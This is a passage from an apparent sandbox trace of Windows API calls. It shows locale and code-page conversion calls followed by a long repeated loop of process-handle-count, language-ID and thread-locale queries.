cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0094.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ띩⸏᫄JĀ") returned 256 [0094.990] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ띩⸏᫄JĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0094.990] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ띩⸏᫄JĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0094.990] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1f\n:Ë\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0094.990] GetLastError () returned 0x0 [0094.990] SetLastError (dwErrCode=0x0) [0094.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0094.991] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ띩⸏᫄JĀ") returned 256 [0094.991] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ띩⸏᫄JĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0094.991] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ띩⸏᫄JĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0094.991] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1f\n:Ë\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0094.991] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e61b) returned 0x0 [0094.991] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x232b70) returned 0x80 [0094.991] GetCurrentProcess () returned 0xffffffff [0094.992] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.992] GetSystemDefaultLangID () returned 0x2710409 [0094.992] GetThreadLocale () returned 0x409 [0094.992] GetCurrentProcess () returned 0xffffffff [0094.992] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.992] GetSystemDefaultLangID () returned 0x2710409 [0094.992] GetThreadLocale () returned 0x409 [0094.992] GetCurrentProcess () returned 0xffffffff [0094.992] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.992] GetSystemDefaultLangID () returned 0x2710409 [0094.992] GetThreadLocale () returned 0x409 [0094.992] GetCurrentProcess () returned 0xffffffff [0094.992] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.993] GetSystemDefaultLangID () returned 0x2710409 [0094.993] GetThreadLocale () returned 0x409 [0094.993] GetCurrentProcess () returned 0xffffffff [0094.993] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.993] GetSystemDefaultLangID () returned 0x2710409 [0094.993] GetThreadLocale () returned 0x409 [0094.993] GetCurrentProcess () returned 0xffffffff [0094.993] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.993] GetSystemDefaultLangID () returned 0x2710409 [0094.993] GetThreadLocale () returned 0x409 [0094.993] GetCurrentProcess () returned 0xffffffff [0094.993] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.993] GetSystemDefaultLangID () returned 0x2710409 [0094.993] GetThreadLocale () returned 0x409 [0094.993] GetCurrentProcess () returned 0xffffffff [0094.993] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.993] GetSystemDefaultLangID () returned 0x2710409 [0094.993] GetThreadLocale () returned 0x409 [0094.993] GetCurrentProcess () returned 0xffffffff [0094.993] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.993] GetSystemDefaultLangID () returned 0x2710409 [0094.993] GetThreadLocale () returned 0x409 [0094.993] GetCurrentProcess () returned 0xffffffff [0094.993] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.993] GetSystemDefaultLangID () returned 0x2710409 [0094.993] GetThreadLocale () returned 0x409 [0094.993] GetCurrentProcess () returned 0xffffffff [0094.993] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.994] GetSystemDefaultLangID () returned 0x2710409 [0094.994] GetThreadLocale () returned 0x409 [0094.994] GetCurrentProcess () returned 0xffffffff [0094.994] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.994] GetSystemDefaultLangID () returned 0x2710409 [0094.994] GetThreadLocale () returned 0x409 [0094.994] GetCurrentProcess () returned 0xffffffff [0094.994] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.994] GetSystemDefaultLangID () returned 0x2710409 [0094.994] GetThreadLocale () returned 0x409 [0094.994] GetCurrentProcess () returned 0xffffffff [0094.994] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.994] GetSystemDefaultLangID () returned 0x2710409 [0094.994] GetThreadLocale () returned 0x409 [0094.994] GetCurrentProcess () returned 0xffffffff [0094.994] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.994] GetSystemDefaultLangID () returned 0x2710409 [0094.994] GetThreadLocale () returned 0x409 [0094.994] GetCurrentProcess () returned 0xffffffff [0094.994] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.994] GetSystemDefaultLangID () returned 0x2710409 [0094.994] GetThreadLocale () returned 0x409 [0094.995] GetCurrentProcess () returned 0xffffffff [0094.995] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.995] GetSystemDefaultLangID () returned 0x2710409 [0094.995] GetThreadLocale () returned 0x409 [0094.995] GetCurrentProcess () returned 0xffffffff [0094.995] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.995] GetSystemDefaultLangID () returned 0x2710409 [0094.995] GetThreadLocale () returned 0x409 [0094.995] GetCurrentProcess () returned 0xffffffff [0094.995] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.995] GetSystemDefaultLangID () returned 0x2710409 [0094.995] GetThreadLocale () returned 0x409 [0094.995] GetCurrentProcess () returned 0xffffffff [0094.995] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.995] GetSystemDefaultLangID () returned 0x2710409 [0094.995] GetThreadLocale () returned 0x409 [0094.995] GetCurrentProcess () returned 0xffffffff [0094.995] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.995] GetSystemDefaultLangID () returned 0x2710409 [0094.995] GetThreadLocale () returned 0x409 [0094.995] GetCurrentProcess () returned 0xffffffff [0094.995] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.995] GetSystemDefaultLangID () returned 0x2710409 [0094.995] GetThreadLocale () returned 0x409 [0094.995] GetCurrentProcess () returned 0xffffffff [0094.995] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.996] GetSystemDefaultLangID () returned 0x2710409 [0094.996] GetThreadLocale () returned 0x409 [0094.996] GetCurrentProcess () returned 0xffffffff [0094.996] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.996] GetSystemDefaultLangID () returned 0x2710409 [0094.996] GetThreadLocale () returned 0x409 [0094.996] GetCurrentProcess () returned 0xffffffff [0094.996] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.996] GetSystemDefaultLangID () returned 0x2710409 [0094.996] GetThreadLocale () returned 0x409 [0094.996] GetCurrentProcess () returned 0xffffffff [0094.996] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.996] GetSystemDefaultLangID () returned 0x2710409 [0094.996] GetThreadLocale () returned 0x409 [0094.996] GetCurrentProcess () returned 0xffffffff [0094.996] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.996] GetSystemDefaultLangID () returned 0x2710409 [0094.996] GetThreadLocale () returned 0x409 [0094.996] GetCurrentProcess () returned 0xffffffff [0094.996] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.996] GetSystemDefaultLangID () returned 0x2710409 [0094.996] GetThreadLocale () returned 0x409 [0094.996] GetCurrentProcess () returned 0xffffffff [0094.996] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.997] GetSystemDefaultLangID () returned 0x2710409 [0094.997] GetThreadLocale () returned 0x409 [0094.997] GetCurrentProcess () returned 0xffffffff [0094.997] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.997] GetSystemDefaultLangID () returned 0x2710409 [0094.997] GetThreadLocale () returned 0x409 [0094.997] GetCurrentProcess () returned 0xffffffff [0094.997] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.997] GetSystemDefaultLangID () returned 0x2710409 [0094.997] GetThreadLocale () returned 0x409 [0094.997] GetCurrentProcess () returned 0xffffffff [0094.997] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.997] GetSystemDefaultLangID () returned 0x2710409 [0094.997] GetThreadLocale () returned 0x409 [0094.997] GetCurrentProcess () returned 0xffffffff [0094.997] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.997] GetSystemDefaultLangID () returned 0x2710409 [0094.997] GetThreadLocale () returned 0x409 [0094.997] GetCurrentProcess () returned 0xffffffff [0094.997] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.997] GetSystemDefaultLangID () returned 0x2710409 [0094.997] GetThreadLocale () returned 0x409 [0094.997] GetCurrentProcess () returned 0xffffffff [0094.997] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.997] GetSystemDefaultLangID () returned 0x2710409 [0094.998] GetThreadLocale () returned 0x409 [0094.998] GetCurrentProcess () returned 0xffffffff [0094.998] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.998] GetSystemDefaultLangID () returned 0x2710409 [0094.998] GetThreadLocale () returned 0x409 [0094.998] GetCurrentProcess () returned 0xffffffff [0094.998] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.998] GetSystemDefaultLangID () returned 0x2710409 [0094.998] GetThreadLocale () returned 0x409 [0094.998] GetCurrentProcess () returned 0xffffffff [0094.998] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.998] GetSystemDefaultLangID () returned 0x2710409 [0094.998] GetThreadLocale () returned 0x409 [0094.998] GetCurrentProcess () returned 0xffffffff [0094.998] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.998] GetSystemDefaultLangID () returned 0x2710409 [0094.998] GetThreadLocale () returned 0x409 [0094.998] GetCurrentProcess () returned 0xffffffff [0094.998] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.998] GetSystemDefaultLangID () returned 0x2710409 [0094.998] GetThreadLocale () returned 0x409 [0094.998] GetCurrentProcess () returned 0xffffffff [0094.998] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.998] GetSystemDefaultLangID () returned 0x2710409 [0094.998] GetThreadLocale () returned 0x409 [0094.999] GetCurrentProcess () returned 0xffffffff [0094.999] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.999] GetSystemDefaultLangID () returned 0x2710409 [0094.999] GetThreadLocale () returned 0x409 [0094.999] GetCurrentProcess () returned 0xffffffff [0094.999] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.999] GetSystemDefaultLangID () returned 0x2710409 [0094.999] GetThreadLocale () returned 0x409 [0094.999] GetCurrentProcess () returned 0xffffffff [0094.999] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.999] GetSystemDefaultLangID () returned 0x2710409 [0094.999] GetThreadLocale () returned 0x409 [0094.999] GetCurrentProcess () returned 0xffffffff [0094.999] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.999] GetSystemDefaultLangID () returned 0x2710409 [0094.999] GetThreadLocale () returned 0x409 [0094.999] GetCurrentProcess () returned 0xffffffff [0094.999] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.999] GetSystemDefaultLangID () returned 0x2710409 [0094.999] GetThreadLocale () returned 0x409 [0094.999] GetCurrentProcess () returned 0xffffffff [0094.999] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.999] GetSystemDefaultLangID () returned 0x2710409 [0094.999] GetThreadLocale () returned 0x409 [0094.999] GetCurrentProcess () returned 0xffffffff [0094.999] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.999] GetSystemDefaultLangID () returned 0x2710409 [0095.000] GetThreadLocale () returned 0x409 [0095.000] GetCurrentProcess () returned 0xffffffff [0095.000] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.000] GetSystemDefaultLangID () returned 0x2710409 [0095.000] GetThreadLocale () returned 0x409 [0095.000] GetCurrentProcess () returned 0xffffffff [0095.000] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.000] GetSystemDefaultLangID () returned 0x2710409 [0095.000] GetThreadLocale () returned 0x409 [0095.000] GetCurrentProcess () returned 0xffffffff [0095.000] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.000] GetSystemDefaultLangID () returned 0x2710409 [0095.000] GetThreadLocale () returned 0x409 [0095.000] GetCurrentProcess () returned 0xffffffff [0095.000] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.000] GetSystemDefaultLangID () returned 0x2710409 [0095.000] GetThreadLocale () returned 0x409 [0095.000] GetCurrentProcess () returned 0xffffffff [0095.000] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.000] GetSystemDefaultLangID () returned 0x2710409 [0095.000] GetThreadLocale () returned 0x409 [0095.000] GetCurrentProcess () returned 0xffffffff [0095.000] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.000] GetSystemDefaultLangID () returned 0x2710409 [0095.000] GetThreadLocale () returned 0x409 [0095.000] GetCurrentProcess () returned 0xffffffff [0095.000] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.001] GetSystemDefaultLangID () returned 0x2710409 [0095.001] GetThreadLocale () returned 0x409 [0095.001] GetCurrentProcess () 